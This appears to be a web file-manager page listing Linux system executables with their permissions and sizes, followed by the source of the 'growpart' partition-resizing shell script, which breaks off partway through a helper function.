-rwxr-xr-x
systemd-machine-id-setup
18.48
KB
-rwxr-xr-x
systemd-mount
50.59
KB
-rwxr-xr-x
systemd-notify
18.38
KB
-rwxr-xr-x
systemd-path
18.37
KB
-rwxr-xr-x
systemd-repart
150.69
KB
-rwxr-xr-x
systemd-run
58.57
KB
-rwxr-xr-x
systemd-socket-activate
26.38
KB
-rwxr-xr-x
systemd-stdio-bridge
18.38
KB
-rwxr-xr-x
systemd-sysext
42.49
KB
-rwxr-xr-x
systemd-sysusers
62.68
KB
-rwxr-xr-x
systemd-tmpfiles
110.57
KB
-rwxr-xr-x
systemd-tty-ask-password-agent
34.38
KB
-rwxr-xr-x
systemd-umount
50.59
KB
-rwxr-xr-x
tabs
18.23
KB
-rwxr-xr-x
tac
111.05
KB
-rwxr-xr-x
tail
75.14
KB
-rwxr-xr-x
tar
519.52
KB
-rwxr-xr-x
taskset
62.31
KB
-rwxr-xr-x
tbl
146.43
KB
-rwxr-xr-x
tbl-dctrl
39.04
KB
-rwxr-xr-x
tcpdump
1.21
MB
-rwxr-xr-x
tee
42.95
KB
-rwxr-xr-x
tempfile
14.18
KB
-rwxr-xr-x
test
58.89
KB
-rwxr-xr-x
tic
90.34
KB
-rwxr-xr-x
timedatectl
42.37
KB
-rwxr-xr-x
timeout
47.49
KB
-rwxr-xr-x
tload
18.32
KB
-rwxr-xr-x
toe
22.23
KB
-rwxr-xr-x
top
131.58
KB
-rwxr-xr-x
touch
107.05
KB
-rwxr-xr-x
tput
26.27
KB
-rwxr-xr-x
tr
54.89
KB
-rwxr-xr-x
traceproto
2.82
KB
-rwxr-xr-x
traceproto.db
2.82
KB
-rwxr-xr-x
traceroute
71.23
KB
-rwxr-xr-x
traceroute-nanog
1.58
KB
-rwxr-xr-x
traceroute.db
71.23
KB
-rwxr-xr-x
traceroute6
71.23
KB
-rwxr-xr-x
traceroute6.db
71.23
KB
-rwxr-xr-x
troff
755.83
KB
-rwxr-xr-x
true
34.83
KB
-rwxr-xr-x
truncate
42.89
KB
-rwxr-xr-x
tset
30.24
KB
-rwxr-xr-x
tsort
54.89
KB
-rwxr-xr-x
tty
34.86
KB
-rwxr-xr-x
tzselect
14.99
KB
-rwxr-xr-x
ubuntu-cloudimg-query
8.37
KB
-rwxr-xr-x
ucf
40.69
KB
-rwxr-xr-x
ucfq
18.91
KB
-rwxr-xr-x
ucfr
10.85
KB
-rwxr-xr-x
uclampset
62.31
KB
-rwxr-xr-x
udevadm
1.29
MB
-rwxr-xr-x
ul
22.31
KB
-rwxr-xr-x
umount
34.3
KB
-rwsr-xr-x
uname
42.86
KB
-rwxr-xr-x
unattended-upgrade
97.21
KB
-rwxr-xr-x
unattended-upgrades
97.21
KB
-rwxr-xr-x
uncompress
2.29
KB
-rwxr-xr-x
unexpand
42.92
KB
-rwxr-xr-x
uniq
46.95
KB
-rwxr-xr-x
unlink
38.83
KB
-rwxr-xr-x
unlzma
82.7
KB
-rwxr-xr-x
unmkinitramfs
3.59
KB
-rwxr-xr-x
unshare
82.54
KB
-rwxr-xr-x
unxz
82.7
KB
-rwxr-xr-x
unzip
175.05
KB
-rwxr-xr-x
unzipsfx
82.86
KB
-rwxr-xr-x
unzstd
1.22
MB
-rwxr-xr-x
update-alternatives
58.31
KB
-rwxr-xr-x
uptime
14.3
KB
-rwxr-xr-x
users
38.89
KB
-rwxr-xr-x
utmpdump
30.3
KB
-rwxr-xr-x
uuidgen
18.3
KB
-rwxr-xr-x
uuidparse
42.31
KB
-rwxr-xr-x
vcs-run
6.75
KB
-rwxr-xr-x
vdir
147.8
KB
-rwxr-xr-x
vi
3.48
MB
-rwxr-xr-x
view
3.48
MB
-rwxr-xr-x
vim
3.48
MB
-rwxr-xr-x
vim.basic
3.48
MB
-rwxr-xr-x
vim.tiny
1.55
MB
-rwxr-xr-x
vimdiff
3.48
MB
-rwxr-xr-x
vimtutor
2.1
KB
-rwxr-xr-x
vmstat
34.72
KB
-rwxr-xr-x
w
22.3
KB
-rwxr-xr-x
wall
38.3
KB
-rwxr-xr-x
watch
26.71
KB
-rwxr-xr-x
wc
51.05
KB
-rwxr-xr-x
wdctl
70.34
KB
-rwxr-xr-x
wget
459.36
KB
-rwxr-xr-x
whatis
51.29
KB
-rwxr-xr-x
whereis
30.77
KB
-rwxr-xr-x
which
946
B
-rwxr-xr-x
which.debianutils
946
B
-rwxr-xr-x
whiptail
26.75
KB
-rwxr-xr-x
who
59.02
KB
-rwxr-xr-x
whoami
38.86
KB
-rwxr-xr-x
write
22.31
KB
-rwxr-xr-x
write-mime-multipart
3.54
KB
-rwxr-xr-x
x86_64
26.58
KB
-rwxr-xr-x
x86_64-linux-gnu-addr2line
23.14
KB
-rwxr-xr-x
x86_64-linux-gnu-ar
51.17
KB
-rwxr-xr-x
x86_64-linux-gnu-as
897.41
KB
-rwxr-xr-x
x86_64-linux-gnu-c++filt
18.51
KB
-rwxr-xr-x
x86_64-linux-gnu-cpp
1.24
MB
-rwxr-xr-x
x86_64-linux-gnu-cpp-12
1.24
MB
-rwxr-xr-x
x86_64-linux-gnu-dwp
1.79
MB
-rwxr-xr-x
x86_64-linux-gnu-elfedit
35.03
KB
-rwxr-xr-x
x86_64-linux-gnu-g++
1.25
MB
-rwxr-xr-x
x86_64-linux-gnu-g++-12
1.25
MB
-rwxr-xr-x
x86_64-linux-gnu-gcc
1.24
MB
-rwxr-xr-x
x86_64-linux-gnu-gcc-12
1.24
MB
-rwxr-xr-x
x86_64-linux-gnu-gcc-ar
34.54
KB
-rwxr-xr-x
x86_64-linux-gnu-gcc-ar-12
34.54
KB
-rwxr-xr-x
x86_64-linux-gnu-gcc-nm
34.54
KB
-rwxr-xr-x
x86_64-linux-gnu-gcc-nm-12
34.54
KB
-rwxr-xr-x
x86_64-linux-gnu-gcc-ranlib
34.54
KB
-rwxr-xr-x
x86_64-linux-gnu-gcc-ranlib-12
34.54
KB
-rwxr-xr-x
x86_64-linux-gnu-gcov
720.16
KB
-rwxr-xr-x
x86_64-linux-gnu-gcov-12
720.16
KB
-rwxr-xr-x
x86_64-linux-gnu-gcov-dump
568.02
KB
-rwxr-xr-x
x86_64-linux-gnu-gcov-dump-12
568.02
KB
-rwxr-xr-x
x86_64-linux-gnu-gcov-tool
588.09
KB
-rwxr-xr-x
x86_64-linux-gnu-gcov-tool-12
588.09
KB
-rwxr-xr-x
x86_64-linux-gnu-gold
2.99
MB
-rwxr-xr-x
x86_64-linux-gnu-gp-archive
159.06
KB
-rwxr-xr-x
x86_64-linux-gnu-gp-collect-ap...
175.27
KB
-rwxr-xr-x
x86_64-linux-gnu-gp-display-ht...
578.29
KB
-rwxr-xr-x
x86_64-linux-gnu-gp-display-sr...
150.81
KB
-rwxr-xr-x
x86_64-linux-gnu-gp-display-te...
257.3
KB
-rwxr-xr-x
x86_64-linux-gnu-gprof
108.35
KB
-rwxr-xr-x
x86_64-linux-gnu-gprofng
146.59
KB
-rwxr-xr-x
x86_64-linux-gnu-ld
1.27
MB
-rwxr-xr-x
x86_64-linux-gnu-ld.bfd
1.27
MB
-rwxr-xr-x
x86_64-linux-gnu-ld.gold
2.99
MB
-rwxr-xr-x
x86_64-linux-gnu-lto-dump
30.47
MB
-rwxr-xr-x
x86_64-linux-gnu-lto-dump-12
30.47
MB
-rwxr-xr-x
x86_64-linux-gnu-nm
44.03
KB
-rwxr-xr-x
x86_64-linux-gnu-objcopy
155.66
KB
-rwxr-xr-x
x86_64-linux-gnu-objdump
362.56
KB
-rwxr-xr-x
x86_64-linux-gnu-ranlib
51.17
KB
-rwxr-xr-x
x86_64-linux-gnu-readelf
751.38
KB
-rwxr-xr-x
x86_64-linux-gnu-size
26.86
KB
-rwxr-xr-x
x86_64-linux-gnu-strings
30.98
KB
-rwxr-xr-x
x86_64-linux-gnu-strip
155.7
KB
-rwxr-xr-x
xargs
70.45
KB
-rwxr-xr-x
xmlcatalog
22.23
KB
-rwxr-xr-x
xmllint
74.91
KB
-rwxr-xr-x
xsubpp
5.05
KB
-rwxr-xr-x
xz
82.7
KB
-rwxr-xr-x
xzcat
82.7
KB
-rwxr-xr-x
xzcmp
7.25
KB
-rwxr-xr-x
xzdiff
7.25
KB
-rwxr-xr-x
xzegrep
10.09
KB
-rwxr-xr-x
xzfgrep
10.09
KB
-rwxr-xr-x
xzgrep
10.09
KB
-rwxr-xr-x
xzless
1.77
KB
-rwxr-xr-x
xzmore
2.14
KB
-rwxr-xr-x
yes
38.83
KB
-rwxr-xr-x
ypdomainname
22.15
KB
-rwxr-xr-x
zcat
1.94
KB
-rwxr-xr-x
zcmp
1.64
KB
-rwxr-xr-x
zdiff
6.31
KB
-rwxr-xr-x
zdump
22.52
KB
-rwxr-xr-x
zegrep
29
B
-rwxr-xr-x
zfgrep
29
B
-rwxr-xr-x
zforce
2.03
KB
-rwxr-xr-x
zgrep
7.91
KB
-rwxr-xr-x
zip
212.27
KB
-rwxr-xr-x
zipcloak
92.48
KB
-rwxr-xr-x
zipdetails
68.55
KB
-rwxr-xr-x
zipgrep
2.89
KB
-rwxr-xr-x
zipinfo
175.05
KB
-rwxr-xr-x
zipnote
84.16
KB
-rwxr-xr-x
zipsplit
88.19
KB
-rwxr-xr-x
zless
2.15
KB
-rwxr-xr-x
zmore
1.8
KB
-rwxr-xr-x
znew
4.47
KB
-rwxr-xr-x
zstd
1.22
MB
-rwxr-xr-x
zstdcat
1.22
MB
-rwxr-xr-x
zstdgrep
3.78
KB
-rwxr-xr-x
zstdless
197
B
-rwxr-xr-x
zstdmt
1.22
MB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : growpart
#!/bin/sh # Copyright (C) 2011 Canonical Ltd. # Copyright (C) 2013 Hewlett-Packard Development Company, L.P. # # Authors: Scott Moser <smoser@canonical.com> # Juerg Haefliger <juerg.haefliger@hp.com> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, version 3 of the License. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # the fudge factor. if within this many bytes dont bother FUDGE=${GROWPART_FUDGE:-$((1024*1024))} TEMP_D="" RESTORE_FUNC="" RESTORE_HUMAN="" VERBOSITY=0 DISK="" PART="" PT_UPDATE=false DRY_RUN=0 FLOCK_DISK_FD="" RESIZE_RESULT="" SFDISK_VERSION="" SFDISK_2_26="22600" SFDISK_V_WORKING_GPT="22603" MBR_BACKUP="" GPT_BACKUP="" _capture="" error() { echo "$@" 1>&2 } fail() { [ $# -eq 0 ] || echo "FAILED:" "$@" exit 2 } nochange() { RESIZE_RESULT="NOCHANGE" echo "NOCHANGE:" "$@" return 1 } changed() { RESIZE_RESULT="CHANGED" echo "CHANGED:" "$@" return 0 } change() { RESIZE_RESULT="CHANGE" echo "CHANGE:" "$@" return 0 } cleanup() { if [ -n "${RESTORE_FUNC}" ]; then error "***** WARNING: Resize failed, attempting to revert ******" if ${RESTORE_FUNC} ; then error "***** Restore appears to have gone OK ****" else error "***** Restore FAILED! ******" if [ -n "${RESTORE_HUMAN}" -a -f "${RESTORE_HUMAN}" ]; then error "**** original table looked like: ****" cat "${RESTORE_HUMAN}" 1>&2 else error "We seem to have not saved the partition table!" fi fi unlock_disk_and_settle $DISK fi [ -z "${TEMP_D}" -o ! -d "${TEMP_D}" ] || rm -Rf "${TEMP_D}" } debug() { local level=${1} shift [ "${level}" -gt "${VERBOSITY}" ] && return if [ "${DEBUG_LOG}" ]; then echo "$@" >>"${DEBUG_LOG}" else error "$@" fi } debugcat() { local level="$1" shift; [ "${level}" -gt "$VERBOSITY" ] && return if [ "${DEBUG_LOG}" ]; then cat "$@" >>"${DEBUG_LOG}" else cat "$@" 1>&2 fi } mktemp_d() { # just a mktemp -d that doens't need mktemp if its not there. _RET=$(mktemp -d "${TMPDIR:-/tmp}/${0##*/}.XXXXXX" 2>/dev/null) && return _RET=$(umask 077 && t="${TMPDIR:-/tmp}/${0##*/}.$$" && mkdir "${t}" && echo "${t}") return } Usage() { cat <<EOF ${0##*/} disk partition rewrite partition table so that partition takes up all the space it can options: -h | --help print Usage and exit --free-percent F resize so that specified percentage F of the disk is not used in total (not just by this partition). This is useful for consumer SSD or SD cards where a small percentage unallocated can improve device lifetime. --fudge F if part could be resized, but change would be less than 'F' bytes, do not resize (default: ${FUDGE}) -N | --dry-run only report what would be done, show new 'sfdisk -d' -v | --verbose increase verbosity / debug -u | --update R update the the kernel partition table info after growing this requires kernel support and 'partx --update' R is one of: - 'auto' : [default] update partition if possible - 'force' : try despite sanity checks (fail on failure) - 'off' : do not attempt - 'on' : fail if sanity checks indicate no support Example: - ${0##*/} /dev/sda 1 Resize partition 1 on /dev/sda - ${0##*/} --free-percent=10 /dev/sda 1 Resize partition 1 on /dev/sda so that 10% of the disk is unallocated EOF } bad_Usage() { Usage 1>&2 error "$@" exit 2 } lock_disk() { local disk="$1" # flock the target disk to protect against udev actions while modifying. # https://systemd.io/BLOCK_DEVICE_LOCKING/ [ "${DRY_RUN}" = 0 ] || return # only lock block devices, files do not need a lock [ -b "${disk}" ] || return # The FD values are hard-coded per /bin/sh requirement for using exec # to open paths with specific fd values; man (1) sh on "Redirections" FLOCK_DISK_FD=9 debug 1 "FLOCK: try exec open fd 9, on failure exec exits this program" exec 9<>$disk # Do not use --nonblock or --timeout as udev may be already processing # the disk and we must wait until it has released the disk to # proceed. Failure to obtain exclusive lock is fatal to growpart. rq flock flock -x $FLOCK_DISK_FD || fail "Error while obtaining exclusive lock on $DISK" debug 1 "FLOCK: $disk: obtained exclusive lock" } unlock_disk_and_settle() { # unlock_disk(disk, settle) local disk="$1" local settle=${2-"1"} # release the lock on a disk if locked. When a disk is locked, # FLOCK_DISK_FD is set to the hard-coded value of 9. # After unlocking run udevadm settle (if installed) as the disk has # likely been changed. [ "${DRY_RUN}" = 0 ] || return [ -n "${FLOCK_DISK_FD}" ] || return debug 1 "FLOCK: ${disk}: releasing exclusive lock" exec 9>&- [ "${settle}" = 1 ] && has_cmd udevadm && udevadm settle FLOCK_DISK_FD="" } sfdisk_restore_legacy() { sfdisk --no-reread "${DISK}" -I "${MBR_BACKUP}" } sfdisk_restore() { # files are named: sfdisk-<device>-<offset>.bak local f="" offset="" fails=0 for f in "${MBR_BACKUP}"*.bak; do [ -f "$f" ] || continue offset=${f##*-} offset=${offset%.bak} [ "$offset" = "$f" ] && { error "WARN: confused by file $f"; continue; } dd "if=$f" "of=${DISK}" seek=$(($offset)) bs=1 conv=notrunc || { error "WARN: failed restore from $f"; fails=$(($fails+1)); } done return $fails } sfdisk_worked_but_blkrrpart_failed() { local ret="$1" output="$2" # exit code found was just 1, but dont insist on that #[ $ret -eq 1 ] || return 1 # Successfully wrote the new partition table if grep -qi "Success.* wrote.* new.* partition" "$output"; then grep -qi "BLKRRPART: Device or resource busy" "$output" return # The partition table has been altered. elif grep -qi "The.* part.* table.* has.* been.* altered" "$output"; then # Re-reading the partition table failed grep -qi "Re-reading.* partition.* table.* failed" "$output" return fi return $ret } get_sfdisk_version() { # set SFDISK_VERSION to MAJOR*10000+MINOR*100+MICRO local out oifs="$IFS" ver="" [ -n "$SFDISK_VERSION" ] && return 0 [ -n "$SFDISK" ] || { SFDISK_VERSION=0 return 0 } # expected output: sfdisk from util-linux 2.25.2 out=$(LANG=C sfdisk --version) || { error "failed to get sfdisk version"; return 1; } set -- $out ver=$4 case "$ver" in [0-9]*.[0-9]*.[0-9]|[0-9].[0-9]*) IFS="."; set -- $ver; IFS="$oifs" SFDISK_VERSION=$(($1*10000+$2*100+${3:-0})) return 0;; *) error "unexpected output in sfdisk --version [$out]" return 1;; esac } get_diskpart_path() { # get_diskpart_path(disk, part_number) # return the path to the partition device on disk # # Convert inputs disk and part into a path to a partition device path # handle both block devices or files. # e.g. get_diskpart_path /dev/loop0 7 returns /dev/loop0p7 local disk="$1" local part="$2" local dpart="" dpart="${disk}${part}" # disk and partition number if [ -b "$disk" ]; then if [ -b "${disk}p${part}" -a "${disk%[0-9]}" != "${disk}" ]; then # for block devices that end in a number (/dev/nbd0) # the partition is "<name>p<partition_number>" (/dev/nbd0p1) dpart="${disk}p${part}" elif [ "${disk#/dev/loop[0-9]}" != "${disk}" ]; then # for /dev/loop devices, sfdisk output will be <name>p<number> # format also, even though there is not a device there. dpart="${disk}p${part}" fi else case "$disk" in # sfdisk for files ending in digit to <disk>p<num>. *[0-9]) dpart="${disk}p${part}";; esac fi _RET="$dpart" } resize_sfdisk() { local humanpt="${TEMP_D}/recovery" local mbr_backup="${TEMP_D}/orig.save" local restore_func="" local format="$1" local change_out=${TEMP_D}/change.out local dump_out=${TEMP_D}/dump.out local new_out=${TEMP_D}/new.out local dump_mod=${TEMP_D}/dump.mod local tmp="${TEMP_D}/tmp.out" local err="${TEMP_D}/err.out" local mbr_max_512="4294967296" local pt_start pt_size pt_end max_end new_size change_info dpart local sector_num sector_size disk_size tot out local excess_sectors free_percent_sectors remaining_free_sectors LANG=C rqe sfd_list sfdisk --list --unit=S "$DISK" >"$tmp" || fail "failed: sfdisk --list $DISK" if [ "${SFDISK_VERSION}" -lt ${SFDISK_2_26} ]; then # exected output contains: Units: sectors of 512 bytes, ... out=$(awk '$1 == "Units:" && $5 ~ /bytes/ { print $4 }' "$tmp") || fail "failed to read sfdisk output" if [ -z "$out" ]; then error "WARN: sector size not found in sfdisk output, assuming 512" sector_size=512 else sector_size="$out" fi local _w _cyl _w1 _heads _w2 sectors _w3 t s # show-size is in units of 1024 bytes (same as /proc/partitions) t=$(sfdisk --show-size "${DISK}") || fail "failed: sfdisk --show-size $DISK" disk_size=$((t*1024)) sector_num=$(($disk_size/$sector_size)) msg="disk size '$disk_size' not evenly div by sector size '$sector_size'" [ "$((${disk_size}%${sector_size}))" -eq 0 ] || error "WARN: $msg" restore_func=sfdisk_restore_legacy else # --list first line output: # Disk /dev/vda: 20 GiB, 21474836480 bytes, 41943040 sectors local _x read _x _x _x _x disk_size _x sector_num _x < "$tmp" sector_size=$((disk_size/$sector_num)) restore_func=sfdisk_restore fi debug 1 "$sector_num sectors of $sector_size. total size=${disk_size} bytes" rqe sfd_dump sfdisk --unit=S --dump "${DISK}" >"${dump_out}" || fail "failed to dump sfdisk info for ${DISK}" RESTORE_HUMAN="$dump_out" { echo "## sfdisk --unit=S --dump ${DISK}" cat "${dump_out}" } >"$humanpt" [ $? -eq 0 ] || fail "failed to save sfdisk -d output" RESTORE_HUMAN="$humanpt" debugcat 1 "$humanpt" sed -e 's/,//g; s/start=/start /; s/size=/size /' "${dump_out}" \ >"${dump_mod}" || fail "sed failed on dump output" get_diskpart_path $DISK $PART dpart="$_RET" pt_start=$(awk '$1 == pt { print $4 }' "pt=${dpart}" <"${dump_mod}") && pt_size=$(awk '$1 == pt { print $6 }' "pt=${dpart}" <"${dump_mod}") && [ -n "${pt_start}" -a -n "${pt_size}" ] && pt_end=$((${pt_size} + ${pt_start} - 1)) || fail "failed to get start and end for ${dpart} in ${DISK}" # find the minimal starting location that is >= pt_end max_end=$(awk '$3 == "start" { if($4 >= pt_end && $4 < min) { min = $4 } } END { printf("%s\n",min); }' \ min=${sector_num} pt_end=${pt_end} "${dump_mod}") && [ -n "${max_end}" ] || fail "failed to get max_end for partition ${PART}" # As sector numbering starts from 0 need to reduce value by 1. max_end=$((max_end - 1)) if [ "$format" = "gpt" ]; then # sfdisk respects 'last-lba' in input, and complains about # partitions that go past that. without it, it does the right thing. sed -i '/^last-lba:/d' "$dump_out" || fail "failed to remove last-lba from output" fi if [ "$format" = "dos" ]; then mbr_max_sectors=$((mbr_max_512*$((sector_size/512)))) if [ "$max_end" -gt "$mbr_max_sectors" ]; then max_end=$mbr_max_sectors fi [ $(($disk_size/512)) -gt $mbr_max_512 ] && debug 0 "WARNING: MBR/dos partitioned disk is larger than 2TB." \ "Additional space will go unused." fi local gpt_second_size="33" if [ "${max_end}" -gt "$((${sector_num}-${gpt_second_size}))" ]; then # if MBR, allow subsequent conversion to GPT without shrinking # the partition and safety net at cost of 33 sectors seems # reasonable. If GPT, we can't write there anyway. debug 1 "padding ${gpt_second_size} sectors for gpt secondary header" max_end=$((${sector_num} - ${gpt_second_size} - 1)) fi if [ -n "${free_percent}" ]; then free_percent_sectors=$((sector_num/100*free_percent)) if [ "$format" = "dos" ]; then if [ $(($disk_size/512)) -ge $((mbr_max_512+free_percent_sectors)) ]; then # If MBR partitioned disk larger than 2TB and # remaining space over 2TB boundary is greater # than the requested overprovisioning sectors # then do not change max_end. debug 1 "WARNING: Additional unused space on MBR/dos partitioned disk" \ "is larger than requested percent of overprovisioning." elif [ $sector_num -gt $mbr_max_512 ]; then # If only some of the overprovisioning sectors # are over the 2TB boundary then reduce max_end # by the remaining number of overprovisioning # sectors. excess_sectors=$((sector_num-mbr_max_512)) remaining_free_sectors=$((free_percent_sectors - excess_sectors)) debug 1 "reserving ${remaining_free_sectors} sectors from MBR maximum for overprovisioning" max_end=$((max_end - remaining_free_sectors)) else # Shrink max_end to keep X% of whole disk unused # (for overprovisioning). debug 1 "reserving ${free_percent_sectors} sectors (${free_percent}%) for overprovisioning" max_end=$((max_end-free_percent_sectors)) fi if [ ${max_end} -lt ${pt_end} ]; then nochange "partition ${PART} could not be grown while leaving" \ "${free_percent}% (${free_percent_sectors} sectors) free on device" return fi else # Shrink max_end to keep X% of whole disk unused # (for overprovisioning). debug 1 "reserving ${free_percent_sectors} sectors (${free_percent}%) for overprovisioning" max_end=$((max_end-free_percent_sectors)) if [ ${max_end} -lt ${pt_end} ]; then nochange "partition ${PART} could not be grown while leaving" \ "${free_percent}% (${free_percent_sectors} sectors) free on device" return fi fi fi debug 1 "max_end=${max_end} tot=${sector_num} pt_end=${pt_end}" \ "pt_start=${pt_start} pt_size=${pt_size}" [ $((${pt_end})) -eq ${max_end} ] && { nochange "partition ${PART} is size ${pt_size}. it cannot be grown" return } [ $((${pt_end}+(${FUDGE}/$sector_size))) -gt ${max_end} ] && { nochange "partition ${PART} could only be grown by" \ "$((${max_end}-${pt_end})) [fudge=$((${FUDGE}/$sector_size))]" return } # Now, change the size for this partition in ${dump_out} to be the # new size. new_size=$((${max_end} - ${pt_start} + 1)) sed "\|^\s*${dpart} |s/\(.*\)${pt_size},/\1${new_size},/" "${dump_out}" \ >"${new_out}" || fail "failed to change size in output" change_info="partition=${PART} start=${pt_start}" change_info="${change_info} old: size=${pt_size} end=${pt_end}" change_info="${change_info} new: size=${new_size} end=${max_end}" if [ ${DRY_RUN} -ne 0 ]; then echo "CHANGE: ${change_info}" { echo "# === old sfdisk -d ===" cat "${dump_out}" echo "# === new sfdisk -d ===" cat "${new_out}" } 1>&2 exit 0 fi MBR_BACKUP="${mbr_backup}" LANG=C sfdisk --no-reread "${DISK}" --force \ -O "${mbr_backup}" <"${new_out}" >"${change_out}" 2>&1 ret=$? [ $ret -eq 0 ] || RESTORE_FUNC="${restore_func}" if [ $ret -eq 0 ]; then debug 1 "resize of ${DISK} returned 0." if [ $VERBOSITY -gt 2 ]; then sed 's,^,| ,' "${change_out}" 1>&2 fi elif $PT_UPDATE && sfdisk_worked_but_blkrrpart_failed "$ret" "${change_out}"; then # if the command failed, but it looks like only because # the device was busy and we have pt_update, then go on debug 1 "sfdisk failed, but likely only because of blkrrpart" else error "attempt to resize ${DISK} failed. sfdisk output below:" sed 's,^,| ,' "${change_out}" 1>&2 fail "failed to resize" fi rq pt_update pt_update "$DISK" "$PART" || fail "pt_resize failed" RESTORE_FUNC="" changed "${change_info}" return # dump_out looks something like: ## partition table of /tmp/out.img #unit: sectors # #/tmp/out.img1 : start= 1, size= 48194, Id=83 #/tmp/out.img2 : start= 48195, size= 963900, Id=83 #/tmp/out.img3 : start= 1012095, size= 305235, Id=82 #/tmp/out.img4 : start= 1317330, size= 771120, Id= 5 #/tmp/out.img5 : start= 1317331, size= 642599, Id=83 #/tmp/out.img6 : start= 1959931, size= 48194, Id=83 #/tmp/out.img7 : start= 2008126, size= 80324, Id=83 } gpt_restore() { sgdisk -l "${GPT_BACKUP}" "${DISK}" } resize_sgdisk() { GPT_BACKUP="${TEMP_D}/pt.backup" local pt_info="${TEMP_D}/pt.info" local pt_pretend="${TEMP_D}/pt.pretend" local pt_data="${TEMP_D}/pt.data" local out="${TEMP_D}/out" local dev="disk=${DISK} partition=${PART}" local pt_start pt_end pt_size last pt_max code guid name new_size local old new change_info sector_size # Dump the original partition information and details to disk. This is # used in case something goes wrong and human interaction is required # to revert any changes. rqe sgd_info sgdisk "--info=${PART}" --print "${DISK}" >"${pt_info}" || fail "${dev}: failed to dump original sgdisk info" RESTORE_HUMAN="${pt_info}" # support reading old format (<1.0.2) # Logical sector size: <VAL> bytes # and newer format >= 1.0.2 # Sector size (logical): <VAL> bytes # Sector size (logical/physical): <VAL>/<PVAL> bytes sector_size=$(awk ' $0 ~ /^Logical sector size:.*bytes/ { print $4; exit(0); } $0 ~ /^Sector size \(logical\):/ { print $4; exit(0); } $0 ~ /^Sector size \(logical\/physical\):/ { sub(/\/.*/, "", $4); print $4; exit(0); }' \ "$pt_info") && [ -n "$sector_size" ] || { sector_size=512 error "WARN: did not find sector size, assuming 512" } debug 1 "$dev: original sgdisk info:" debugcat 1 "${pt_info}" # Pretend to move the backup GPT header to the end of the disk and dump # the resulting partition information. We use this info to determine if # we have to resize the partition. rqe sgd_pretend sgdisk --pretend --move-second-header \ --print "${DISK}" >"${pt_pretend}" || fail "${dev}: failed to dump pretend sgdisk info" debug 1 "$dev: pretend sgdisk info" debugcat 1 "${pt_pretend}" # Extract the partition data from the pretend dump awk 'found { print } ; $1 == "Number" { found = 1 }' \ "${pt_pretend}" >"${pt_data}" || fail "${dev}: failed to parse pretend sgdisk info" # Get the start and end sectors of the partition to be grown pt_start=$(awk '$1 == '"${PART}"' { print $2 }' "${pt_data}") && [ -n "${pt_start}" ] || fail "${dev}: failed to get start sector" pt_end=$(awk '$1 == '"${PART}"' { print $3 }' "${pt_data}") && [ -n "${pt_end}" ] || fail "${dev}: failed to get end sector" # Start and end are inclusive, start 2048 end 2057 is length 10. pt_size="$((${pt_end} - ${pt_start} + 1))" # Get the last usable sector last=$(awk '/last usable sector is/ { print $NF }' \ "${pt_pretend}") && [ -n "${last}" ] || fail "${dev}: failed to get last usable sector" # Find the maximal end sector that is >= pt_end pt_max=$(awk '{ if ($2 >= pt_end && $2 < min) { min = $2 } } END \ { print min-1 }' min="${last}" pt_end="${pt_end}" \ "${pt_data}") && [ -n "${pt_max}" ] || fail "${dev}: failed to find max end sector" debug 1 "${dev}: pt_start=${pt_start} pt_end=${pt_end}" \ "pt_size=${pt_size} pt_max=${pt_max} last=${last}" # Check if the partition can be grown [ "${pt_end}" -eq "${pt_max}" ] && { nochange "${dev}: size=${pt_size}, it cannot be grown" return } [ "$((${pt_end} + ${FUDGE}/${sector_size}))" -gt "${pt_max}" ] && { nochange "${dev}: could only be grown by" \ "$((${pt_max} - ${pt_end})) [fudge=$((${FUDGE}/$sector_size))]" return } # The partition can be grown if we made it here. Get some more info # about it so we can do it properly. # FIXME: Do we care about the attribute flags? code=$(awk '/^Partition GUID code:/ { print $4 }' "${pt_info}") guid=$(awk '/^Partition unique GUID:/ { print $4 }' "${pt_info}") name=$(awk '/^Partition name:/ { gsub(/'"'"'/, "") ; \ if (NF >= 3) print substr($0, index($0, $3)) }' "${pt_info}") [ -n "${code}" -a -n "${guid}" ] || fail "${dev}: failed to parse sgdisk details" debug 1 "${dev}: code=${code} guid=${guid} name='${name}'" local wouldrun="" [ "$DRY_RUN" -ne 0 ] && wouldrun="would-run" # Calculate the new size of the partition new_size=$((${pt_max} - ${pt_start} + 1)) change_info="partition=${PART} start=${pt_start}" change_info="${change_info} old: size=${pt_size} end=${pt_end}" change_info="${change_info} new: size=${new_size} end=${pt_max}" # Backup the current partition table, we're about to modify it rq sgd_backup $wouldrun sgdisk "--backup=${GPT_BACKUP}" "${DISK}" || fail "${dev}: failed to backup the partition table" # Modify the partition table. We do it all in one go (the order is # important!): # - move the GPT backup header to the end of the disk # - delete the partition # - recreate the partition with the new size # - set the partition code # - set the partition GUID # - set the partition name rq sgdisk_mod $wouldrun sgdisk --move-second-header "--delete=${PART}" \ "--new=${PART}:${pt_start}:$((pt_max-1))" \ "--typecode=${PART}:${code}" \ "--partition-guid=${PART}:${guid}" \ "--change-name=${PART}:${name}" "${DISK}" && rq pt_update $wouldrun pt_update "$DISK" "$PART" || { RESTORE_FUNC=gpt_restore fail "${dev}: failed to repartition" } # Dry run [ "${DRY_RUN}" -ne 0 ] && { change "${change_info}" return } changed "${change_info}" return } kver_to_num() { local kver="$1" maj min mic # Canonicalize the kernel version kver=${kver%%[!0-9.]*}.0.0 maj=${kver%%[!0-9]*} kver=${kver#*.} min=${kver%%[!0-9]*} kver=${kver#*.} mic=${kver%%[!0-9]*} _RET=$((maj*1000*1000+min*1000+mic)) } kver_cmp() { local op="$2" n1="" n2="" kver_to_num "$1" n1="$_RET" kver_to_num "$3" n2="$_RET" test $n1 $op $n2 } rq() { # runquieterror(label, command) # gobble stderr of a command unless it errors local label="$1" ret="" efile="" efile="$TEMP_D/$label.err" shift; local rlabel="running" [ "$1" = "would-run" ] && rlabel="would-run" && shift local cmd="" x="" for x in "$@"; do [ "${x#* }" != "$x" -o "${x#* \"}" != "$x" ] && x="'$x'" cmd="$cmd $x" done cmd=${cmd# } debug 2 "${rlabel}[$label][$_capture]" "$cmd" [ "$rlabel" = "would-run" ] && return 0 if [ "${_capture}" = "erronly" ]; then "$@" 